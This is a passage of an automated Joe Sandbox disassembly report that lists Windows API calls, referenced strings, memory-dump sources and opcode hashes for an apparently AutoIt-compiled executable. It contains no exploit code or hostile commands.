                                                              • Instruction Fuzzy Hash: CA11B271600208AFFF258F94DC81EFB3B6AEB883A8F110129F914D7290DA75DC51A7A1
                                                              APIs
                                                                • Part of subcall function 00F11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F11D73
                                                                • Part of subcall function 00F11D35: GetStockObject.GDI32(00000011), ref: 00F11D87
                                                                • Part of subcall function 00F11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F11D91
                                                              • GetWindowRect.USER32(00000000,?), ref: 00F96C71
                                                              • GetSysColor.USER32(00000012), ref: 00F96C8B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                              • String ID: static
                                                              • API String ID: 1983116058-2160076837
                                                              • Opcode ID: f8aa4cab4061af72ead947fd80e35b55d097e79ea7051c0c3abde65a5cc3f0db
                                                              • Instruction ID: 88198dcf8d0d437191c7218003b6804330e1e385cdf9300da4a2906d6fb80bd4
                                                              • Opcode Fuzzy Hash: f8aa4cab4061af72ead947fd80e35b55d097e79ea7051c0c3abde65a5cc3f0db
                                                              • Instruction Fuzzy Hash: 77212972910209AFEF04DFB8DC45AEA7BA8FB08315F154629F995D2250D635E850EB60
                                                              APIs
                                                              • GetWindowTextLengthW.USER32(00000000), ref: 00F969A2
                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F969B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: LengthMessageSendTextWindow
                                                              • String ID: edit
                                                              • API String ID: 2978978980-2167791130
                                                              • Opcode ID: 2d9f34eee45781bfebf6c6ead70228adc32d835f08a4085111dccd9f5fc1b0d7
                                                              • Instruction ID: 44a217b4eb371df7a949831ab975354e0dcf30a4a56339fadcf71068cdc154a0
                                                              • Opcode Fuzzy Hash: 2d9f34eee45781bfebf6c6ead70228adc32d835f08a4085111dccd9f5fc1b0d7
                                                              • Instruction Fuzzy Hash: 6C116A71910208ABFF108F649C44EEB37A9EB053B8F604724F9A5D61E0C635DC94B760
                                                              APIs
                                                              • _memset.LIBCMT ref: 00F72A22
                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00F72A41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: InfoItemMenu_memset
                                                              • String ID: 0
                                                              • API String ID: 2223754486-4108050209
                                                              • Opcode ID: 43b683348dbd9877a2ffe3fcdccc735a50ba19b39ec33eb583c183fdaa493308
                                                              • Instruction ID: 995a516cd30a03c4c881da0091fa0cefa9c6f6f69fa5b31b44af1e87c21bd75a
                                                              • Opcode Fuzzy Hash: 43b683348dbd9877a2ffe3fcdccc735a50ba19b39ec33eb583c183fdaa493308
                                                              • Instruction Fuzzy Hash: 2311E932D01118ABEF70DB58DC44B9A73B9AB46320F148023E95DE7250D734AD09F792
                                                              APIs
                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F8222C
                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F82255
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Internet$OpenOption
                                                              • String ID: <local>
                                                              • API String ID: 942729171-4266983199
                                                              • Opcode ID: 8a846c42ef573adffc74b05e9f49eac70f0c709ca1dcd56cc2f0e0af3de3a76f
                                                              • Instruction ID: a5431e566ab526045f407cd3c27aea4ff26f2ee5a9569c6c5187c40f35bf9642
                                                              • Opcode Fuzzy Hash: 8a846c42ef573adffc74b05e9f49eac70f0c709ca1dcd56cc2f0e0af3de3a76f
                                                              • Instruction Fuzzy Hash: 6F11E370901225BAEB64AF518CC8FF7FBA8FF06361F10822AF50486000D3706954E7F1
                                                              APIs
                                                                • Part of subcall function 00F17DE1: _memmove.LIBCMT ref: 00F17E22
                                                                • Part of subcall function 00F6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F6AABC
                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F68E73
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameSend_memmove
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 372448540-1403004172
                                                              • Opcode ID: 90e17be2aebfc533d5a4a68ddef1bc4bde74304627f6a0b49a0e1b0a683c3041
                                                              • Instruction ID: c3847765da939425794f96a0d6d84b91753f59250e26ab6d38db03822204c185
                                                              • Opcode Fuzzy Hash: 90e17be2aebfc533d5a4a68ddef1bc4bde74304627f6a0b49a0e1b0a683c3041
                                                              • Instruction Fuzzy Hash: E101F5B1A01219EB8B14FBE0CC42DFE7368AF11360B50061DB835672D2DE3A580CF651
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: __fread_nolock_memmove
                                                              • String ID: EA06
                                                              • API String ID: 1988441806-3962188686
                                                              • Opcode ID: 615921d6fcb446cb20c78443b08c785d081702d069e8b0f53fd20ce193b88edc
                                                              • Instruction ID: fd0e4dac0e484dece851fe2bfd37ba2ab58e6c9c55613a86d4e83fc802ee77c3
                                                              • Opcode Fuzzy Hash: 615921d6fcb446cb20c78443b08c785d081702d069e8b0f53fd20ce193b88edc
                                                              • Instruction Fuzzy Hash: A301F972D042187EDB28CAA8CC16EEE7BF8DB11711F00419FF556D2181E879E6049760
                                                              APIs
                                                                • Part of subcall function 00F17DE1: _memmove.LIBCMT ref: 00F17E22
                                                                • Part of subcall function 00F6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F6AABC
                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00F68D6B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameSend_memmove
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 372448540-1403004172
                                                              • Opcode ID: bc689e506fd09669fd6a03829a6242fd370b80d09ba24c4ef116925597ddf741
                                                              • Instruction ID: 19b85e2398482b66fe5ee8083d838d35373c9a6cb593b55602bc03df7e5e25f8
                                                              • Opcode Fuzzy Hash: bc689e506fd09669fd6a03829a6242fd370b80d09ba24c4ef116925597ddf741
                                                              • Instruction Fuzzy Hash: B601D471A41209ABCB14EBE0CE52EFE73A89F15350F50011AB805632D2DE299E0CF672
                                                              APIs
                                                                • Part of subcall function 00F17DE1: _memmove.LIBCMT ref: 00F17E22
                                                                • Part of subcall function 00F6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F6AABC
                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00F68DEE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameSend_memmove
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 372448540-1403004172
                                                              • Opcode ID: 5243def08c7663f8e6f63e22afd86e843e6c5f1ef6b036116444d009699aa1e0
                                                              • Instruction ID: 068676841ff954e152eb81e16b8b21da473e011121f3641e4d0d5b466063a7bd
                                                              • Opcode Fuzzy Hash: 5243def08c7663f8e6f63e22afd86e843e6c5f1ef6b036116444d009699aa1e0
                                                              • Instruction Fuzzy Hash: 4E01A771A41209ABDB15F7A4CE46EFE77AC9F11350F50011AB905B32D2DE298E0DF672
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ClassName_wcscmp
                                                              • String ID: #32770
                                                              • API String ID: 2292705959-463685578
                                                              • Opcode ID: 7481c929a3c5279226e325e345d5a450869554655c3c556a2da2707d385927c8
                                                              • Instruction ID: 548fb0c02f9d11c98cf33ba505c84c54da8ca4a44aa084b25040f7bcca97828c
                                                              • Opcode Fuzzy Hash: 7481c929a3c5279226e325e345d5a450869554655c3c556a2da2707d385927c8
                                                              • Instruction Fuzzy Hash: 01E0D13350022D27D710D795AC45FA7F7ACDB45B70F050057FD04D3051D5609A5597D1
                                                              APIs
                                                                • Part of subcall function 00F4B314: _memset.LIBCMT ref: 00F4B321
                                                                • Part of subcall function 00F30940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00F4B2F0,?,?,?,00F1100A), ref: 00F30945
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,00F1100A), ref: 00F4B2F4
                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00F1100A), ref: 00F4B303
                                                              Strings
                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F4B2FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                              • API String ID: 3158253471-631824599
                                                              • Opcode ID: 1243625bb3b039d8abc6135c937087e9272248571f87e25e3b8d2ff61c46263d
                                                              • Instruction ID: 6d8d596651c352c1bd6652d806957f6056d1a662ec297479dcc371c5a1f02059
                                                              • Opcode Fuzzy Hash: 1243625bb3b039d8abc6135c937087e9272248571f87e25e3b8d2ff61c46263d
                                                              • Instruction Fuzzy Hash: 46E092702007108FD760DF3AD8047967BE4AF04755F00892EE846C7342EBB8D448EFA1
                                                              APIs
                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F67C82
                                                                • Part of subcall function 00F33358: _doexit.LIBCMT ref: 00F33362
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Message_doexit
                                                              • String ID: AutoIt$Error allocating memory.
                                                              • API String ID: 1993061046-4017498283
                                                              • Opcode ID: d18aed841b5742c5285e58cfb4648f09cae799f2cd3d26ae25c334bff6ce4daa
                                                              • Instruction ID: 26ca3265a59ec6e4245259af9236a3414dbcdafe0cf1738cb7457ea5af6735aa
                                                              • Opcode Fuzzy Hash: d18aed841b5742c5285e58cfb4648f09cae799f2cd3d26ae25c334bff6ce4daa
                                                              • Instruction Fuzzy Hash: F5D0123238835C36D11532A56D07FCA75488F05B66F044426BB04995D349D6959071A5
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 00F51775
                                                                • Part of subcall function 00F8BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00F5195E,?), ref: 00F8BFFE
                                                                • Part of subcall function 00F8BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00F8C010
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00F5196D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                              • String ID: WIN_XPe
                                                              • API String ID: 582185067-3257408948
                                                              • Opcode ID: 9e3512279333ba0b87f3cb01dcddf33ce5a9b29e01e88eee2c186488adb899f9
                                                              • Instruction ID: c739c7da9e33ad6981de5538360563d3a66b10baa85a526d1d194edd7fadee0f
                                                              • Opcode Fuzzy Hash: 9e3512279333ba0b87f3cb01dcddf33ce5a9b29e01e88eee2c186488adb899f9
                                                              • Instruction Fuzzy Hash: 11F0A571801109EBDB15DBA5D984BECBBB8BB08306F540096E606A25A1D7755E88EF60
                                                              APIs
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F959AE
                                                              • PostMessageW.USER32(00000000), ref: 00F959B5
                                                                • Part of subcall function 00F75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F752BC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: FindMessagePostSleepWindow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 529655941-2988720461
                                                              • Opcode ID: 6f71f9701e6d6161b96874ab2bf27c20f2121c4da3ab79c6ed4ffd8b44d672b4
                                                              • Instruction ID: d1f0fa88b4ecfe827ddc461140d8bdab4cd9c73a33b4854227e9ef66f26143ec
                                                              • Opcode Fuzzy Hash: 6f71f9701e6d6161b96874ab2bf27c20f2121c4da3ab79c6ed4ffd8b44d672b4
                                                              • Instruction Fuzzy Hash: A2D012317C03157BE664BB709D0FFD77A14BB04B50F05083AB34AEA1D1C9E4A804D655
                                                              APIs
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F9596E
                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F95981
                                                                • Part of subcall function 00F75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F752BC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: FindMessagePostSleepWindow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 529655941-2988720461
                                                              • Opcode ID: d57536d190a61f5ed78a000922016729d57b93b565741e5148b2a394c4381eac
                                                              • Instruction ID: 84fefbc13c5ee361d79c65589fd45494f1b81a93d397e1169b2e66e1fc962362
                                                              • Opcode Fuzzy Hash: d57536d190a61f5ed78a000922016729d57b93b565741e5148b2a394c4381eac
                                                              • Instruction Fuzzy Hash: A0D01231784315B7E664BB709D0FFD77A14BF00B50F05083AB34AEA1D1C9E49804D654